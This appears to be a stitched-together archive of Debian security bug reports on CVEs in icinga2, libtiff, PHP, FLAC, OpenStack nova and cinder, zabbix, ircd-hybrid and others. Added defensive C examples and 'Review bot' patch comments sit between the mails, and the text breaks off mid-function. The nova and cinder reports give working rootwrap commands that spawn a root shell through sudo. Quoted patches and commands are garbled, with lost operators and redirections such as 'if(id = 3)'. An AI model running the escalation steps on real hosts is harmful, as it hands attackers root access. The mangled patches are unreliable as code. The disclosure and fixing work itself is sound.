Bug#883247: CVE-2017-16933: icinga2: root privilege escalation via prepare-dirs
Package: icinga2
Version: None
X-Debbugs-CC: t...@security.debian.org secure-testing-t...@lists.alioth.debian.org
Severity: grave
Tags: security

Hi,

the following vulnerability was published for icinga2.

CVE-2017-16933:
| etc/initsystem/prepare-dirs in Icinga 2.x through 2.8.0 has a chown
| call for a filename in a user-writable directory, which allows local
| users to gain privileges by leveraging access to the $ICINGA2_USER
| account for creation of a link.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

https://security-tracker.debian.org/tracker/CVE-2017-16933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16933
https://github.com/Icinga/icinga2/issues/5793

Please adjust the affected versions in the BTS as needed.

-- 
Henri Salo
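The chown call on a path inside a user-writable directory is the general symlink-following hazard of chown(2): the path is resolved a second time at chown time, and a link planted by the directory's owner redirects the ownership change to any file. The C program below is an added example, not the icinga2 prepare-dirs script or any Icinga code. It opens the target with O_NOFOLLOW and applies the change through the descriptor with fchown(2), so a planted link is refused with ELOOP instead of being followed. The scratch directory under TMPDIR (or /tmp), the file names and the use of the caller's own uid/gid are constructed for the demonstration so it runs without privileges.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Change ownership of path without following a symbolic link in its final
 * component.  Returns 0 on success, -1 with errno set on failure; a symlink
 * fails with ELOOP because of O_NOFOLLOW.  The change is applied through the
 * open descriptor with fchown(2), so the object that was opened is the object
 * that is chowned, with no second path lookup in between. */
int chown_nofollow(const char *path, uid_t uid, gid_t gid)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    int rc = fchown(fd, uid, gid);
    int saved = errno;
    close(fd);
    errno = saved;
    return rc;
}

/* Self-contained demonstration.  Builds a scratch directory holding a
 * regular file and a symlink pointing at it (standing in for a link planted
 * by the service user), then compares plain chown(2) with chown_nofollow().
 * Ownership is set to the caller's own uid/gid, so no privilege is needed.
 * Returns 1 when the file is accepted, plain chown() follows the link, and
 * chown_nofollow() refuses the link with ELOOP; 0 otherwise. */
int demo_symlink_is_refused(void)
{
    const char *tmp = getenv("TMPDIR");
    char dir[256];
    snprintf(dir, sizeof dir, "%s/chown-demo-XXXXXX", tmp ? tmp : "/tmp");
    if (mkdtemp(dir) == NULL)
        return 0;
    char file[512], lnk[512];
    snprintf(file, sizeof file, "%s/icinga2.log", dir);   /* constructed name */
    snprintf(lnk, sizeof lnk, "%s/planted", dir);        /* constructed name */

    int fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return 0;
    close(fd);
    if (symlink("icinga2.log", lnk) != 0)   /* relative link inside the scratch dir */
        return 0;

    uid_t uid = getuid();
    gid_t gid = getgid();
    int file_ok       = chown_nofollow(file, uid, gid) == 0;
    int plain_follows = chown(lnk, uid, gid) == 0;                        /* the hazard */
    int link_refused  = chown_nofollow(lnk, uid, gid) != 0 && errno == ELOOP;

    unlink(lnk);
    unlink(file);
    rmdir(dir);
    return file_ok && plain_follows && link_refused;
}

int main(void)
{
    printf("symlink refused by chown_nofollow: %s\n",
           demo_symlink_is_refused() ? "yes" : "no");
    return 0;
}
```

O_NOFOLLOW only guards the final path component; a hardened setup script also opens the parent directory with O_DIRECTORY|O_NOFOLLOW and works relative to it with openat(2), or better, avoids changing ownership of anything below a directory the service user can write to.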
Bug#881796: CVE-2017-1001001: pluxml: XSS and missing httponly flag
Package: pluxml
Version: 5.5-2
Severity: grave
Tags: security upstream

https://nvd.nist.gov/vuln/detail/CVE-2017-1001001
https://github.com/pluxml/PluXml/issues/253

PluXml version 5.6 is vulnerable to a stored cross-site scripting vulnerability within the article creation page, which can result in escalation of privileges.

Two problems:

- Cross-site scripting vulnerability with "writer" role
- Missing HttpOnly flag

-- 
Henri Salo
Bug#855142: security bug closed without fix
Shouldn't this be closed AFTER the fix is available? Especially since this is a security issue.

-- 
Henri Salo
Bug#830700: CVE-2016-5314: tiff: PixarLogDecode() heap-based buffer overflow
Package: tiff
Version: 4.0.6-1
Severity: critical
Tags: security, fixed-upstream

Hi LibTIFF maintainer(s),

Kaixiang Zhang from Qihoo 360 and Mathias Svensson from Google discovered a heap-based buffer overflow vulnerability in the PixarLogDecode() function in libtiff/tif_pixarlog.c in the TIFF library, which may result in denial of service or the execution of arbitrary code if a malformed TIFF file is processed.

Upstream has fixed this vulnerability in the following commit (the repository is a mirror of the upstream CVS repository):

https://github.com/vadz/libtiff/commit/391e77fcd217e78b2c51342ac3ddb7100ecacdd2

This was reported by several researchers simultaneously.

CVE-2016-5314 upstream bug report:
http://bugzilla.maptools.org/show_bug.cgi?id=2554

CVE-2016-5316 has been marked as a duplicate of upstream bug #2554 as it is fixed by the same commit:
http://bugzilla.maptools.org/show_bug.cgi?id=2556

http://www.openwall.com/lists/oss-security/2016/06/30/3 says:

"""I think this is a duplicate with CVE-2016-5320 and CVE-2016-5314. CVE-2016-5875 (buffer overrun in PixarLogDecode()) is CVE-2016-5314 (PixarLogDecode() out-of-bound writes) which causes CVE-2016-5320 (rgb2ycbcr command execution)."""

Reproducers:
http://bugzilla.maptools.org/attachment.cgi?id=654
http://bugs.fi/media/afl/libtiff/CVE-2016-5875.tif
http://bugzilla.maptools.org/attachment.cgi?id=656

Please double check the situation before making changes to the Debian source package. Feel free to contact me or the Debian security team in case you have any questions.

-- 
Henri Salo
Bug#797729: information
I'm not sure why you are offensive or why your attitude is like that. Communication is an important key to getting changes into Debian. I am replying to this bug item so that you receive more information about Debian security related aspects. Please note that if you want some changes to Debian you need to create a bug item per issue or work with the team or package maintainer to get patches applied. Offensive bug reports like this one do not probably get you to your goal.

Please see for details:

- Team website: https://www.debian.org/security/
- Wiki page: https://wiki.debian.org/Teams/Security
- Meetings: https://wiki.debian.org/DebianSecurity/Meetings (the latest meeting, which was held at DebConf, is not yet listed here)
- IRC-channel: irc://irc.debian.org/debian-security
- FAQ: https://www.debian.org/security/faq
- List of security features: https://wiki.debian.org/Security/Features (not complete)
- Embedded code copies: https://wiki.debian.org/EmbeddedCodeCopies

Most of the actual security tracking work is done in the Debian security-tracker. Please see:

https://security-tracker.debian.org/tracker/
http://security-team.debian.org/security_tracker.html
http://lists.alioth.debian.org/pipermail/secure-testing-team/

Could you submit a bug to the issue tracker about one issue at a time without an aggressive tone?

-- 
Henri Salo
Bug#794560: WordPress 4.2.3 and earlier multiple vulnerabilities
Package: wordpress
Version: 4.2.3+dfsg-1
Severity: grave
Tags: security, fixed-upstream

This release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site, which were discovered by Marc-Alexandre Montpas of Sucuri, Helen Hou-Sandí of the WordPress security team, Netanel Rubin of Check Point, and Ivan Grigorov. It also includes a fix for a potential timing side-channel attack, discovered by Johannes Schmitt of Scrutinizer, and prevents an attacker from locking a post from being edited, discovered by Mohamed A. Baset.

For more information please see:
https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/
http://openwall.com/lists/oss-security/2015/08/04/5

-- 
Henri Salo

-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#783099: php5: Fileinfo on specific file causes spurious OOM and/or segfault
I reported this issue to the Debian BTS to notify package maintainers and, in the long run, to try to get security issues fixed. Maintainers are not always following security issues in upstream and so on (not saying this about PHP). I verified that the segfault condition occurred and did not do a more detailed analysis of the issue. If there is no security issue in PHP with the PoC we can close this bug.

-- 
Henri Salo
Bug#783099: php5: Fileinfo on specific file causes spurious OOM and/or segfault
Source: php5
Version: 5.6.7+dfsg-1
Severity: grave
Tags: security, upstream, fixed-upstream

Hi,

the following vulnerability was published for PHP5:

When calling finfo::file() or finfo::buffer() with a crafted string, PHP will crash by either segfaulting or trying to allocate a large amount of memory (4GiB). This was found in the wild when a user uploaded a file (running finfo on arbitrary files uploaded by users is one of its main use cases). I've since anonymised the file, and made it more minimal. At this stage, very small changes to the string make it produce different behaviour - removing the remaining 'a', 's', or 'y' characters, for instance, will allow finfo to process it fine.

For further information see:
https://bugs.php.net/bug.php?id=68819
https://git.php.net/?p=php-src.git;a=commitdiff;h=f938112c495b0d26572435c0be73ac0bfe642ecd

-- 
Henri Salo
Bug#770918: patches
Attached patches from upstream, which apply to 1.2.1-6. DSA should be created. --- Henri Salo --- src/libFLAC/stream_decoder.c.orig 2014-11-25 13:41:50.280032892 +0200 +++ src/libFLAC/stream_decoder.c 2014-11-25 13:48:39.697566936 +0200 @@ -94,7 +94,7 @@ * ***/ -static FLAC__byte ID3V2_TAG_[3] = { 'I', 'D', '3' }; +static const FLAC__byte ID3V2_TAG_[3] = { 'I', 'D', '3' }; /*** * @@ -1386,6 +1386,10 @@ id = 0; continue; } + + if(id = 3) + return false; + if(x == ID3V2_TAG_[id]) { id++; i = 0; --- src/libFLAC/stream_decoder.c.orig 2014-11-25 13:41:50.280032892 +0200 +++ src/libFLAC/stream_decoder.c 2014-11-25 13:46:21.862277460 +0200 @@ -2726,7 +2726,8 @@ if(decoder-private_-frame.header.blocksize predictor_order) { send_error_to_client_(decoder, FLAC__STREAM_DECODER_ERROR_STATUS_LOST_SYNC); decoder-protected_-state = FLAC__STREAM_DECODER_SEARCH_FOR_FRAME_SYNC; - return true; + /* We have received a potentially malicious bt stream. All we can do is error out to avoid a heap overflow. */ + return false; } } else { signature.asc Description: Digital signature
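Review bot: the bound check added in the second hunk reads `if(id = 3)`, which in C is an assignment that is always true, so as transcribed the ID3v2 tag scanner would return false on every pass instead of only when `id` has reached the 3-byte length of `ID3V2_TAG_`; the comparison operator (`>=`) has almost certainly been dropped in transit, as the same mail also shows `decoder-private_-frame.header.blocksize` with its `->` missing, so apply these hunks from the upstream commit rather than from this mail and confirm the early return sits before the `ID3V2_TAG_[id]` index it protects.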
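Review bot: the third hunk's condition is shown as `if(decoder-private_-frame.header.blocksize predictor_order)` with no comparison operator at all, so the relation that triggers `FLAC__STREAM_DECODER_ERROR_STATUS_LOST_SYNC` cannot be verified from this mail; the new comment also says "malicious bt stream" where "bit stream" is meant. The substantive change is `return true` becoming `return false` after the error has been sent: the comment states that erroring out is the only way to avoid the heap overflow, so the previous `return true`, which let decoding continue on the undersized frame, is the bug being closed and should be called out as such in the changelog entry.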
Bug#732300: info
With up-to-date jessie I can reproduce this issue with the following commands. I think the input device is correct, but I am not sure. If I run cat /dev/input/eventX I can see data in the terminal when I type something, but it is not the text I was writing.

1)
logkeys --export-keymap=keymap.txt
logkeys --start --keymap=keymap --output=output.txt
echo abcdefghijklmnopqrstuvwxyz
logkeys --kill

2)
logkeys --start --output=output.txt
echo abcdefghijklmnopqrstuvwxyz
logkeys --kill

-- 
Henri Salo
Bug#732300: update
Hi,

I can reproduce this issue without --keymap in the example.

logkeys --start --output=output.txt
typesomething
logkeys --kill

File output.txt contains gibberish.

-- 
Henri Salo
Bug#763759: [Secure-testing-team] Bug#763759: bash: please drop debian-specific privmode disablement patch
On Thu, Oct 02, 2014 at 10:09:53AM -0300, Henrique de Moraes Holschuh wrote:
> Package: bash
> Version: 4.2+dfsg-0.1+deb7u3
> Severity: grave
> Tags: security
> Justification: user security hole

There is this issue already open: http://bugs.debian.org/720545

Can you verify that this new issue in BTS is a duplicate? If it is, I'd prefer that you comment there and we close this (not merge, so that the discussion is easier to read/follow).

Thank you for your work regarding Debian security.

-- 
Henri Salo
Bug#687484: Status of CVE-2012-4414: SQL injection
What is the current status of CVE-2012-4414? Information about the issue is in http://www.openwall.com/lists/oss-security/2012/09/11/4

Marked as grave and security without any comments from maintainers. Are there plans to patch this issue? If not, could you please give reasoning, thank you.

-- 
Henri Salo
Bug#758972: Please remove mojarra
Package: mojarra
Version: 2.0.3-3
Severity: critical
Tags: security

Please remove the mojarra source package from Debian as it has been unmaintained and contains several unfixed security vulnerabilities with no replies from the maintainer.

https://packages.debian.org/source/sid/mojarra
http://packages.qa.debian.org/m/mojarra.html
https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=mojarra

CVE-2012-2672: https://bugs.debian.org/677194 (Jun 2012)
CVE-2013-5855: https://bugs.debian.org/740586 (Mar 2014)

Moritz commented on this in a private email:

> Unmaintained packages should be removed, but spring build-depends on one of the libs from mojarra:
>
> jmm@pisco:~$ build-rdeps libjsf-api-java
> Reverse Build-depends in main:
> --
> libspring-java
>
> So it needs to be checked whether that can be dropped from Spring.

If the maintainer shows some activity I could help to get these issues fixed.

-- 
Henri Salo
Bug#758972: data
No need to remove it if we can update it, and I am definitely not suggesting that we remove all those dependencies (the original email did not suggest that either). Please contact me in case you need help with those CVEs when you have spare time (off BTS preferred). All I want is to close those vulnerabilities.

-- 
Henri Salo
Bug#756334: question
Do you have an alternative solution? Maybe this could be extracted directly into the source package and updated with a script?

-- 
Henri Salo
Bug#754655: polarssl: CVE-2014-4911: Denial of Service against GCM enabled servers and clients
Package: polarssl
Version: 1.3.7-2
Severity: critical
Tags: security, fixed-upstream

Please see for details:
https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-02

-- 
Henri Salo
Bug#753579: nova: CVE-2013-1068: local privilege escalation
Package: nova-common
Version: 2014.1.1-1
Severity: grave
Tags: security, confirmed

After installing nova-common the file /etc/sudoers.d/nova-common is created. If /etc/sudoers contains

#includedir /etc/sudoers.d

nova is vulnerable to CVE-2013-1068 local privilege escalation. The vulnerability does not need a working OpenStack installation. If I am correct OpenStack does not work without the includedir configuration, so it is probably usually enabled in OpenStack instances.

PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019

echo [DEFAULT] /tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d /tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] /tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root /tmp/my-filters.d/my.filters
sudo nova-rootwrap /tmp/my-rootwrap.conf sh
id

-- System Information:
Debian Release: 7.5
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Bug#753585: cinder: CVE-2013-1068: local privilege escalation
Package: cinder-common
Version: 2014.1.1-2
Severity: grave
Tags: security, confirmed

After installing cinder-common the file /etc/sudoers.d/cinder-common is created. If /etc/sudoers contains

#includedir /etc/sudoers.d

cinder is vulnerable to CVE-2013-1068 local privilege escalation. The vulnerability does not need a working OpenStack installation. If I am correct OpenStack does not work without the includedir configuration, so it is probably usually enabled in OpenStack instances.

PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019

echo [DEFAULT] /tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d /tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] /tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root /tmp/my-filters.d/my.filters
sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id

-- 
Henri Salo
Bug#751940: update
Do you have any more information about this? It is quite hard to fix a security vulnerability without any details.

-- 
Henri Salo
Bug#751910: update
Upstream bug report: https://support.zabbix.com/browse/ZBX-8151
Bug#751910: zabbix: CVE-2014-3005: local file inclusion via XXE
Package: zabbix Version: 1:2.2.3+dfsg-1 Severity: grave Tags: security Advisory: http://seclists.org/fulldisclosure/2014/Jun/87 Below might be the fix, but please verify. --- Henri Salo svn diff -r46596:46600 Index: frontends/php/include/defines.inc.php === --- frontends/php/include/defines.inc.php (revision 46596) +++ frontends/php/include/defines.inc.php (revision 46600) @@ -835,6 +835,9 @@ define('ZBX_DEFAULT_IMPORT_HOST_GROUP', 'Imported hosts'); +// XML import flags +define('LIBXML_IMPORT_FLAGS', LIBXML_NONET); + // API errors define('ZBX_API_ERROR_INTERNAL', 111); define('ZBX_API_ERROR_PARAMETERS', 100); Index: frontends/php/include/classes/import/readers/CXmlImportReader.php === --- frontends/php/include/classes/import/readers/CXmlImportReader.php (revision 46596) +++ frontends/php/include/classes/import/readers/CXmlImportReader.php (revision 46600) @@ -32,7 +32,8 @@ */ public function read($string) { libxml_use_internal_errors(true); - $result = simplexml_load_string($string); + libxml_disable_entity_loader(true); + $result = simplexml_load_string($string, null, LIBXML_IMPORT_FLAGS); if (!$result) { $errors = libxml_get_errors(); libxml_clear_errors(); Index: frontends/php/include/classes/import/CXmlImport18.php === --- frontends/php/include/classes/import/CXmlImport18.php (revision 46596) +++ frontends/php/include/classes/import/CXmlImport18.php (revision 46600) @@ -390,12 +390,13 @@ return $array; } - public static function import($file) { + public static function import($source) { libxml_use_internal_errors(true); + libxml_disable_entity_loader(true); $xml = new DOMDocument(); - if (!$xml-loadXML($file)) { + if (!$xml-loadXML($source, LIBXML_IMPORT_FLAGS)) { $text = ''; foreach (libxml_get_errors() as $error) { switch ($error-level) { signature.asc Description: Digital signature
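Review bot: in the CXmlImportReader.php hunk, `libxml_disable_entity_loader(true)` sets process-global libxml state and nothing restores it after `simplexml_load_string()` returns, so other code running later in the same PHP request that legitimately loads external entities will start failing without an obvious cause; keep the previous value the call returns and restore it once the import has been parsed, or document that the import path deliberately leaves the loader off. The flag choice is sound as far as the hunk shows: `LIBXML_NONET` (from the defines.inc.php hunk) stops the parser from fetching anything over the network, and no entity-substitution flag is added, which is the combination that neutralises the XXE.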
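Review bot: the CXmlImport18.php hunk renames the public static `import()` parameter from `$file` to `$source` but the docblock immediately above the hunk (the `*/` is the first context line) is not touched, so the documented parameter name no longer matches; update it in the same change. The same unrestored `libxml_disable_entity_loader(true)` caveat as in the reader applies here, and since both call sites now pass `LIBXML_IMPORT_FLAGS` to `loadXML()` / `simplexml_load_string()`, any future adjustment to the flags belongs only in defines.inc.php, which is the right place for the constant.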
Bug#747166: CVE-2014-0196: pty layer race condition memory corruption
Package: linux
Version: 3.14.2-1
Severity: grave
Tags: security

Crashes the kernel from userland. Also works in linux-headers-3.2.0-4-amd64.

PoC: http://pastebin.com/yTSFUBgZ

More information:
http://www.openwall.com/lists/oss-security/2014/05/05/6
https://bugzilla.novell.com/show_bug.cgi?id=875690

-- 
Henri Salo
Bug#742059: nginx: CVE-2014-0133: SPDY heap buffer overflow
Source: nginx
Version: 1.4.6-1
Severity: grave
Tags: security, fixed-upstream

http://nginx.org/en/security_advisories.html
http://nginx.org/download/patch.2014.spdy2.txt

Not vulnerable: 1.5.12+, 1.4.7+
Vulnerable: 1.3.15-1.5.11

-- 
Henri Salo
Bug#728235: info
Confirmed. Maintainer, do you know the reason for this already or do you need help?

-- 
Henri Salo
Bug#726936: more information needed
What do you mean by this bug report? Please provide more information.

-- 
Henri Salo
Bug#697617: jenkins: CVE-2013-0158: remote code execution vulnerability
Hello,

Is there something I could do to help get this bug fixed and closed? Please contact me in case you want any help.

-- 
Henri Salo
Bug#701115: status
What is the status of this issue? The fixes done in oC-SA-2013-006 are very important.

A code execution vulnerability in ownCloud 4.5.6 and 4.0.11 and all prior versions allows authenticated remote attackers to execute arbitrary PHP code via unspecified POST parameters to translations.php in /core/ajax/

-- 
Henri Salo
Bug#699267: update
I do not know what I did wrong when I was reproducing this issue. Sorry about the false information in the bug report. At least we got it fixed.

-- 
Henri Salo
Bug#699267: ircd-hybrid: Denial of service vulnerability in hostmask.c:try_parse_v4_netmask()
Package: ircd-hybrid
Version: 1:7.2.2.dfsg.2-6.2
Severity: grave
Tags: security

Mr. Bob Nomnomnom from Torland reported a denial of service security vulnerability in ircd-hybrid. The function hostmask.c:try_parse_v4_netmask() uses strtoul to parse masks. The documentation says strtoul can parse -number as well. Validation of the input does not catch evil bits. I can give a proof of concept if needed.

Fixed in commit: http://svn.ircd-hybrid.org:8000/viewcvs.cgi/ircd-hybrid/trunk/src/hostmask.c?r1=1786&r2=1785&pathrev=1786
Fixed in: ircd-hybrid 8.0.6

I have requested a CVE identifier for this vulnerability.

Program received signal SIGSEGV, Segmentation fault.
0x0041c799 in try_parse_v4_netmask (text=<value optimized out>, addr=0x113e270, b=0x113e2f8) at hostmask.c:229
229         addb[bits / 8] = ~((1 << (8 - bits % 8)) - 1);
(gdb) bt
#0  0x0041c799 in try_parse_v4_netmask (text=<value optimized out>, addr=0x113e270, b=0x113e2f8) at hostmask.c:229
#1  parse_netmask (text=<value optimized out>, addr=0x113e270, b=0x113e2f8) at hostmask.c:255
#2  0x0040c4ab in add_id (client_p=0x77f9a058, chptr=0x11264e8, banid=<value optimized out>, type=<value optimized out>) at channel_mode.c:233
#3  0x0040cd28 in chm_ban (client_p=0x77f9a058, source_p=0x77f9a058, chptr=0x11264e8, parc=<value optimized out>, parn=0x77565580, parv=0x2f, errors=0x7fffdd08, alev=2, dir=1, c=98 'b', d=0x0, chname=0x1126774 #foo) at channel_mode.c:803
#4  0x0040baac in set_channel_mode (client_p=<value optimized out>, source_p=<value optimized out>, chptr=<value optimized out>, member=<value optimized out>, parc=2, parv=0x8ed410, chname=0x1126774 #foo) at channel_mode.c:1785
#5  0x7fffee7655a4 in m_mode (client_p=0x77f9a058, source_p=0x77f9a058, parc=4, parv=0x8ed400) at m_mode.c:115
#6  0x00422d9f in parse_client_queued (client_p=0x77f9a058) at packet.c:216
#7  0x00422ee5 in read_packet (fd=0x10faa18, data=<value optimized out>) at packet.c:359
#8  0x00423ead in comm_select () at s_bsd_epoll.c:204
#9  0x0041f7f8 in io_loop (argc=0, argv=0x7fffe588) at ircd.c:237
#10 main (argc=0, argv=0x7fffe588) at ircd.c:670

-- 
Henri Salo
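The crash line in the backtrace indexes addb[bits / 8] with a bits value that came straight out of strtoul, and strtoul happily accepts "-1", leading whitespace and trailing junk. The C program below is an added example, not ircd-hybrid's hostmask.c: it parses the "/bits" part of an IPv4 mask and rejects every one of those inputs before the value is ever used as an index, then builds the mask with the same partial-byte expression as the crashing line, which is safe only because the length has been bounded to 0..32 first. The function and constant names are my own; the sample inputs in main() are constructed.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define V4_MAX_BITS 32   /* an IPv4 prefix length can never exceed 32 */

/* Parse the "/bits" part of an IPv4 mask.  Returns 1 and stores the value
 * on success, 0 on any malformed input.  strtoul(3) on its own would accept
 * "-1" (wrapping to a huge unsigned value), skip leading whitespace and stop
 * silently at the first non-digit, so each of those cases is closed here. */
int parse_v4_prefix_len(const char *text, unsigned *bits_out)
{
    if (text == NULL || *text == '\0')
        return 0;
    if (!isdigit((unsigned char)text[0]))   /* rejects '-', '+' and whitespace */
        return 0;
    errno = 0;
    char *end = NULL;
    unsigned long v = strtoul(text, &end, 10);
    if (errno == ERANGE || *end != '\0')    /* overflow or trailing junk */
        return 0;
    if (v > V4_MAX_BITS)                    /* keeps bits / 8 inside a 4-byte array */
        return 0;
    *bits_out = (unsigned)v;
    return 1;
}

/* Convenience wrapper: the parsed prefix length, or -1 if rejected. */
int parse_v4_prefix_or_neg(const char *text)
{
    unsigned bits;
    return parse_v4_prefix_len(text, &bits) ? (int)bits : -1;
}

/* Build the 4-byte netmask for a validated prefix length.  The partial-byte
 * expression is the one from the crashing line in the backtrace; it is safe
 * here only because bits has already been bounded to 0..32. */
void v4_mask_from_bits(unsigned bits, unsigned char mask[4])
{
    memset(mask, 0, 4);
    unsigned full = bits / 8;
    for (unsigned i = 0; i < full; i++)
        mask[i] = 0xff;
    if (bits % 8 != 0)                      /* full < 4 whenever bits < 32 */
        mask[full] = (unsigned char)~((1u << (8 - bits % 8)) - 1);
}

/* The mask as a single 32-bit value, for checking and printing. */
unsigned long v4_mask_value(unsigned bits)
{
    unsigned char m[4];
    v4_mask_from_bits(bits, m);
    return ((unsigned long)m[0] << 24) | ((unsigned long)m[1] << 16) |
           ((unsigned long)m[2] << 8) | m[3];
}

int main(void)
{
    /* Constructed inputs: valid lengths plus the shapes strtoul mishandles. */
    const char *inputs[] = { "24", "32", "0", "-1", "33", " 8", "24x", "" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int bits = parse_v4_prefix_or_neg(inputs[i]);
        if (bits < 0)
            printf("%-6s rejected\n", inputs[i]);
        else
            printf("%-6s ok, mask 0x%08lx\n", inputs[i], v4_mask_value((unsigned)bits));
    }
    return 0;
}
```

The two rules that matter are the isdigit check on the first character, which is the only reliable way to keep strtoul from swallowing a sign or whitespace, and the upper bound checked before any arithmetic on the value; a signed comparison after the fact would not help, because the wrapped value is already an unsigned long by then.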
Bug#698916: update
I have manually verified this issue with https://github.com/FireFart/WordpressPingbackPortScanner

-- 
Henri Salo
Bug#698490: CVE
CVE request: http://www.openwall.com/lists/oss-security/2013/01/22/8

-- 
Henri Salo
Bug#698490: CVE needed?
Hello,

Does this issue have a CVE identifier? I am happy to request one if there isn't one yet.

-- 
Henri Salo
Bug#697722: rails: CVE-2013-0156: Multiple vulnerabilities in parameter parsing in Action Pack
Package: rails
Version: 2:2.3.14.2
Severity: grave
Tags: security

http://www.openwall.com/lists/oss-security/2013/01/08/14
https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion

Multiple vulnerabilities in parameter parsing in Action Pack

There are multiple weaknesses in the parameter parsing code for Ruby on Rails which allows attackers to bypass authentication systems, inject arbitrary SQL, inject and execute arbitrary code, or perform a DoS attack on a Rails application. This vulnerability has been assigned the CVE identifier CVE-2013-0156.

Versions Affected: ALL versions
Not affected: NONE
Fixed Versions: 3.2.11, 3.1.10, 3.0.19, 2.3.15

snip

This probably affects squeeze and wheezy too. Please contact me in case you need any help!

-- 
Henri Salo
Bug#688008: CVE requested
CVE requested in oss-security: http://www.openwall.com/lists/oss-security/2012/09/21/8

-- 
Henri Salo
Bug#688007: CVE-request done
CVE request: http://www.openwall.com/lists/oss-security/2012/09/20/7

-- 
Henri Salo
Bug#688008: CVE
Does this issue have a CVE identifier?

-- 
Henri Salo
Bug#688007: CVE
Does this issue have a CVE identifier?

-- 
Henri Salo
Bug#685581: inn: CVE-2012-3523 prone to STARTTLS plaintext command injection
Package: inn
Version: 1.7.2q-41
Severity: grave

From the oss-security mailing list:

the STARTTLS implementation in INN's NNTP server for readers, nnrpd, before 2.5.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted sessions by sending a cleartext command that is processed after TLS is in place, related to a plaintext command injection attack, a similar issue to CVE-2011-0411.

References:
[1] https://www.isc.org/software/inn/2.5.3article
[2] https://bugs.gentoo.org/show_bug.cgi?id=432002
[3] https://bugzilla.redhat.com/show_bug.cgi?id=850478

Relevant upstream patch (the 'diff -Nurp inn-2.5.2/nnrpd/misc.c inn-2.5.3/nnrpd/misc.c' part):
[4] ftp://ftp.isc.org/isc/inn/inn-2.5.2-2.5.3.diff.gz

http://www.openwall.com/lists/oss-security/2012/08/21/8
http://www.openwall.com/lists/oss-security/2012/08/21/12

-- 
Henri Salo
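The "does not properly restrict I/O buffering" wording describes a specific server-side rule: bytes that were already read into the plaintext input buffer behind a STARTTLS command must be discarded, because they arrived before the TLS handshake and a man-in-the-middle could have appended them. The C program below is an added example, not INN's nnrpd code: a minimal line-oriented command reader that drains its buffer at the STARTTLS boundary and only dispatches what arrives after the handshake. The connection structure, function names and the wire data in the demo (STARTTLS with a pipelined AUTHINFO line in the same read, followed by a MODE READER sent after the handshake) are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

struct conn {
    char   buf[BUF_SIZE];   /* bytes read from the socket, not yet parsed */
    size_t len;
    int    tls_active;      /* 1 once STARTTLS has been accepted */
    int    executed;        /* commands handed to the dispatcher */
    size_t discarded;       /* plaintext bytes dropped at the STARTTLS boundary */
};

/* Simulated socket delivery: append a chunk of received bytes. */
static void conn_feed(struct conn *c, const char *data, size_t n)
{
    size_t room = BUF_SIZE - c->len;
    if (n > room)
        n = room;                   /* a real server would reject the overflow */
    memcpy(c->buf + c->len, data, n);
    c->len += n;
}

/* Pop one CRLF-terminated line into line[]; returns 0 when none is complete. */
static int conn_next_line(struct conn *c, char *line, size_t cap)
{
    for (size_t i = 0; i + 1 < c->len; i++) {
        if (c->buf[i] == '\r' && c->buf[i + 1] == '\n') {
            size_t n = i < cap - 1 ? i : cap - 1;
            memcpy(line, c->buf, n);
            line[n] = '\0';
            size_t used = i + 2;
            memmove(c->buf, c->buf + used, c->len - used);
            c->len -= used;
            return 1;
        }
    }
    return 0;
}

/* Drain buffered commands.  The rule that closes the plaintext-injection
 * hole: when STARTTLS is accepted, whatever is still in the buffer was
 * received before the TLS handshake and must be thrown away, not parsed
 * later as though it had arrived inside the encrypted session. */
void conn_process(struct conn *c)
{
    char line[256];
    while (conn_next_line(c, line, sizeof line)) {
        if (!c->tls_active && strcmp(line, "STARTTLS") == 0) {
            c->tls_active = 1;
            c->discarded += c->len;     /* bytes pipelined behind STARTTLS */
            c->len = 0;
            return;                     /* handshake happens here; later reads are ciphertext */
        }
        c->executed++;                  /* stand-in for the real command dispatcher */
    }
}

/* Constructed wire data: one TCP read carrying STARTTLS and, pipelined
 * behind it in plaintext, a command the client never sent. */
static void demo_scenario(struct conn *c)
{
    const char *wire = "STARTTLS\r\nAUTHINFO USER injected\r\n";
    memset(c, 0, sizeof *c);
    conn_feed(c, wire, strlen(wire));
    conn_process(c);
}

size_t demo_injected_bytes_discarded(void)
{
    struct conn c;
    demo_scenario(&c);
    return c.discarded;                 /* 24: the whole pipelined command */
}

int demo_commands_executed_at_starttls(void)
{
    struct conn c;
    demo_scenario(&c);
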